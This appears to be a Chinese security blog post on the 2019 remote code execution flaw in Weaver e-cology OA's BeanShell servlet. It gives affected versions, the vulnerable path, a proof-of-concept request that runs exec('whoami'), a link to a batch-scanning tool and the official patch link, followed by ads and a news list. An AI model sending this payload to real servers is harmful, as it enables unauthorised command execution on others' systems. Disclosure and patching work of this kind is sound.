泛微E-cology OA远程代码执行漏洞0day 复现/POC
2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞。攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令,目前该漏洞安全补丁已发布,请使用泛微e-cology OA系统的用户尽快采取防护措施。
批量检测:https://github.com/sunird/e-cology-poc
- 漏洞名称:泛微e-cology OA系统远程代码执行漏洞
- 威胁等级:严重
- 影响范围:泛微e-cology <= 9.0
- 漏洞类型:远程代码执行漏洞
- 利用难度:容易
复现
漏洞路径:/weaver/bsh.servlet.BshServlet
poc:
bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

修复
官方补丁:https://www.weaver.com.cn/cs/securityDownload.asp关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 9月3日阅兵 习近平将检阅部队 7904808
- 2 人社部:个人养老金领取时需缴纳个税 7808702
- 3 村民拍下贵州垮塌大桥事发瞬间 7712466
- 4 抗战胜利80周年纪念活动十项安排 7617884
- 5 印度外长:邻国要么合作要么付出代价 7523336
- 6 曝“香港顶流”姜涛坠海被送医 7427875
- 7 #挨打的伊朗为何愿意停火# 7329629
- 8 特朗普称以伊均违反停火协议 7237144
- 9 中方回应“特朗普称伊以已停火” 7144027
- 10 考生675分觉得遗憾 爸爸:太行了! 7042822